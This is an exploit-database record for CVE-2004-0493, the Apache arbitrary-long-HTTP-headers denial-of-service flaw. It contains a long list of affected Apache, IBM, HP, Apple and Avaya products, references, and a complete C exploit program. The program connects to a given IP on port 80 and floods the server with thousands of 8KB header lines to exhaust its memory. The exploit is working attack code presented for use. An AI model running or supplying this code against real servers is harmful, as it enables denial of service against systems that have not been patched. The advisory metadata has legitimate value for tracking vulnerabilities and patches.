ID
VAR-E-200406-0043
CVE
cve_id: | CVE-2004-0493 | Trust: 1.9 |
EDB ID
371
TITLE
Apache - Arbitrary Long HTTP Headers Denial of Service (C) - Linux dos Exploit
Trust: 0.6
DESCRIPTION
Apache - Arbitrary Long HTTP Headers Denial of Service (C). CVE-7269CVE-2004-0493 . dos exploit for Linux platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | apache | model: | - | scope: | - | version: | - | Trust: 1.0 |
vendor: | apache | model: | httpd | scope: | - | version: | - | Trust: 0.6 |
vendor: | trustix | model: | secure linux | scope: | eq | version: | 2.1 | Trust: 0.3 |
vendor: | trustix | model: | secure linux | scope: | eq | version: | 2.0 | Trust: 0.3 |
vendor: | trustix | model: | secure linux | scope: | eq | version: | 1.5 | Trust: 0.3 |
vendor: | trustix | model: | secure enterprise linux | scope: | eq | version: | 2.0 | Trust: 0.3 |
vendor: | ibm | model: | http server | scope: | eq | version: | 2.0.47.1 | Trust: 0.3 |
vendor: | ibm | model: | http server | scope: | eq | version: | 2.0.47 | Trust: 0.3 |
vendor: | ibm | model: | http server | scope: | eq | version: | 2.0.42.2 | Trust: 0.3 |
vendor: | ibm | model: | http server | scope: | eq | version: | 2.0.42.1 | Trust: 0.3 |
vendor: | ibm | model: | http server | scope: | eq | version: | 2.0.42 | Trust: 0.3 |
vendor: | hp | model: | hp-ux b.11.23 | scope: | - | version: | - | Trust: 0.3 |
vendor: | hp | model: | hp-ux b.11.22 | scope: | - | version: | - | Trust: 0.3 |
vendor: | hp | model: | hp-ux b.11.11 | scope: | - | version: | - | Trust: 0.3 |
vendor: | hp | model: | hp-ux b.11.00 | scope: | - | version: | - | Trust: 0.3 |
vendor: | gentoo | model: | linux | scope: | eq | version: | 1.4 | Trust: 0.3 |
vendor: | avaya | model: | s8700 r2.0.0 | scope: | - | version: | - | Trust: 0.3 |
vendor: | avaya | model: | s8500 r2.0.0 | scope: | - | version: | - | Trust: 0.3 |
vendor: | avaya | model: | s8300 r2.0.0 | scope: | - | version: | - | Trust: 0.3 |
vendor: | avaya | model: | converged communications server | scope: | eq | version: | 2.0 | Trust: 0.3 |
vendor: | apple | model: | mac os server | scope: | eq | version: | x10.3.5 | Trust: 0.3 |
vendor: | apple | model: | mac os server | scope: | eq | version: | x10.3.4 | Trust: 0.3 |
vendor: | apple | model: | mac os server | scope: | eq | version: | x10.2.8 | Trust: 0.3 |
vendor: | apple | model: | mac os | scope: | eq | version: | x10.3.5 | Trust: 0.3 |
vendor: | apple | model: | mac os | scope: | eq | version: | x10.3.4 | Trust: 0.3 |
vendor: | apple | model: | mac os | scope: | eq | version: | x10.2.8 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.49 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.48 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.47 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.46 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.45 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.44 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.43 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.42 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.41 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.40 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.39 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.38 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.37 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.36 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.35 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.32 | Trust: 0.3 |
vendor: | apache | model: | beta | scope: | eq | version: | 2.0.28 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.28 | Trust: 0.3 |
vendor: | apache | model: | a9 | scope: | eq | version: | 2.0 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | ne | version: | 2.0.50 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | ne | version: | 1.3.31 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | ne | version: | 1.3.29 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | ne | version: | 1.3.28 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | ne | version: | 1.3.27 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | ne | version: | 1.3.26 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | ne | version: | 1.3.25 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | ne | version: | 1.3.24 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | ne | version: | 1.3.23 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | ne | version: | 1.3.22 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | ne | version: | 1.3.20 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | ne | version: | 1.3.19 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | ne | version: | 1.3.18 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | ne | version: | 1.3.17 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | ne | version: | 1.3.14 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | ne | version: | 1.3.12 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | ne | version: | 1.3.11 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | ne | version: | 1.3.9 | Trust: 0.3 |
vendor: | apache | model: | -dev | scope: | ne | version: | 1.3.7 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | ne | version: | 1.3.6 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | ne | version: | 1.3.4 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | ne | version: | 1.3.3 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | ne | version: | 1.3.1 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | ne | version: | 1.3 | Trust: 0.3 |
EXPLOIT
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>
#define A 0x41
#define PORT 80
struct sockaddr_in hrm;
int conn(char *ip)
{
int sockfd;
hrm.sin_family = AF_INET;
hrm.sin_port = htons(PORT);
hrm.sin_addr.s_addr = inet_addr(ip);
bzero(&(hrm.sin_zero),8);
sockfd=socket(AF_INET,SOCK_STREAM,0);
if((connect(sockfd,(struct sockaddr*)&hrm,sizeof(struct sockaddr)))<0)
{
perror("connect");
exit(0);
}
return sockfd;
}
int main(int argc, char *argv[])
{
int i,x;
char buf[300],a1[8132],a2[50],host[100],content[100];
char *ip=argv[1],*new=malloc(sizeof(int));
sprintf(new,"\r\n");
memset(a1,'\0',8132);
memset(host,'\0',100);
memset(content,'\0',100);
a1[0] = ' ';
for(i=1;i<8132;i++)
a1[i] = A;
if(argc<2)
{
printf("%s: IP\n",argv[0]);
exit(0);
}
x = conn(ip);
printf("[x] Connected to: %s.\n",inet_ntoa(hrm.sin_addr));
sprintf(host,"Host: %s\r\n",argv[1]);
sprintf(content,"Content-Length: 50\r\n");
sprintf(buf,"GET / HTTP/1.0\r\n");
write(x,buf,strlen(buf));
printf("[x] Sending buffer...");
for(i=0;i<2000;i++)
{
write(x,a1,strlen(a1));
write(x,new,strlen(new));
}
memset(buf,'\0',300);
strcpy(buf,host);
strcat(buf,content);
for(i=0;i<50;i++)
a2[i] = A;
strcat(buf,a2);
strcat(buf,"\r\n\r\n");
write(x,buf,strlen(buf));
printf("done!\n");
close(x);
}
// milw0rm.com [2004-08-02]
Trust: 1.0
EXPLOIT LANGUAGE
c
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Arbitrary Long HTTP Headers Denial of Service (C)
Trust: 1.0
CREDITS
anonymous
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2004-0493 | Trust: 1.9 |
db: | EXPLOIT-DB | id: | 371 | Trust: 1.6 |
db: | EDBNET | id: | 25045 | Trust: 0.6 |
db: | BID | id: | 10619 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2004-0493 | Trust: 1.6 |
url: | https://www.exploit-db.com/exploits/371/ | Trust: 0.6 |
url: | http://rhn.redhat.com/errata/rhsa-2004-342.html | Trust: 0.3 |
url: | http://www-1.ibm.com/support/docview.wss?rs=177&context=sseqtj&uid=swg21174271&loc=en_us&cs=utf-8&lang=en+en | Trust: 0.3 |
url: | http://httpd.apache.org/ | Trust: 0.3 |
SOURCES
db: | BID | id: | 10619 |
db: | EXPLOIT-DB | id: | 371 |
db: | EDBNET | id: | 25045 |
LAST UPDATE DATE
2022-07-27T09:17:45.849000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 10619 | date: | 2010-08-05T19:46:00 |
SOURCES RELEASE DATE
db: | BID | id: | 10619 | date: | 2004-06-28T00:00:00 |
db: | EXPLOIT-DB | id: | 371 | date: | 2004-08-02T00:00:00 |
db: | EDBNET | id: | 25045 | date: | 2004-08-02T00:00:00 |